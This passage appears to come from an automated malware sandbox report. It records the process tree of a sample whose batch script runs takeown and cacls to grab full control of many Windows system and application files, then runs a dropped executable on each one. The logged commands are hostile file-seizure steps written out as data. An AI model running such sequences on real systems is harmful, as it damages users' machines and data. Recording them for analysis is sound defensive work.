        wUY1KnWt.exe -accepteula "store.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:2448
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db"
    3⤵
    - Modifies file permissions
    PID:2844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "qmgr.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2176
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "qmgr.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:3012
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""
  2⤵
  PID:3176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"
    3⤵
    - Modifies file permissions
    PID:3380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "store.db" -nobanner
    3⤵
    PID:3936
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:3136
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3244
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr.db""
  2⤵
  PID:3764
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C
    3⤵
    PID:3936
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr.db"
    3⤵
    PID:3244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "qmgr.db" -nobanner
    3⤵
    PID:2996
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "qmgr.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:2972
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3600
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""
  2⤵
  PID:2880
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:2488
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"
    3⤵
    PID:3764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:2852
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:260
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2632
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""
  2⤵
  PID:3136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:1492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:2584
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:2504
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2100
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml""
  2⤵
  PID:3804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml" /E /G Admin:F /C
    3⤵
    PID:3552
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "AssemblyList_4_extended.xml" -nobanner
    3⤵
    PID:3596
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "AssemblyList_4_extended.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2176
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  2⤵
  PID:3616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:920
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2400
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:680
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""
  2⤵
  PID:920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3552
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:624
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2488
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Network\Downloader\edb.log""
  2⤵
  PID:3656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\edb.log" /E /G Admin:F /C
    3⤵
    PID:3552
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\edb.log"
    3⤵
    - Modifies file permissions
    PID:2488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "edb.log" -nobanner
    3⤵
    PID:3144
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "edb.log" -nobanner
      4⤵
      Executes dropped EXE
      PID:2752
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml""
  2⤵
  PID:3616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml" /E /G Admin:F /C
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftNotepad.xml" -nobanner
    3⤵
    PID:2700
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftNotepad.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:1908
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml""
  2⤵
  PID:3552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" /E /G Admin:F /C
    3⤵
    PID:3360
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
    3⤵
    PID:3012
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2176
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:624
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml""
  2⤵
  PID:2864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" /E /G Admin:F /C
    3⤵
    PID:3376
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "NetworkPrinters.xml" -nobanner
    3⤵
    PID:2400
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "NetworkPrinters.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2116
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  2⤵
  PID:2844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
    3⤵
    PID:1272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    3⤵
    PID:3560
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "OfficeIntegrator.ps1" -nobanner
      4⤵
      Executes dropped EXE
      PID:2488
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
  2⤵
  PID:3376
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:920
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "behavior.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:3552
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  2⤵
  PID:1272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3360
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:364
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2844
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2176
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  2⤵
  PID:3804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:624
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2580
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat""
  2⤵
  PID:3380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "StorageHealthModel.dat" -nobanner
    3⤵
    PID:3804
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "StorageHealthModel.dat" -nobanner
      4⤵
      Executes dropped EXE
      PID:2104
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2176
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml""
  2⤵
  PID:1344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml" /E /G Admin:F /C
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner
    3⤵
    PID:3656
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2700
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2176
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml""
  2⤵
  PID:2880
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml" /E /G Admin:F /C
    3⤵
    PID:3380
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner
    3⤵
    PID:3552
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2176
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml""
  2⤵
  PID:2116
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml" /E /G Admin:F /C
    3⤵
    PID:3380
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "ThemeSettings2013.xml" -nobanner
    3⤵
    PID:2880
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "ThemeSettings2013.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:2580
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:3560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "background.png" -nobanner
    3⤵
    PID:2116
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "background.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:3360
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  PID:3376
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2880
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:1544
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:1888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:624
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:3616
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""
  2⤵
  PID:3552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C
    3⤵
    PID:3560
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
    3⤵
    PID:2880
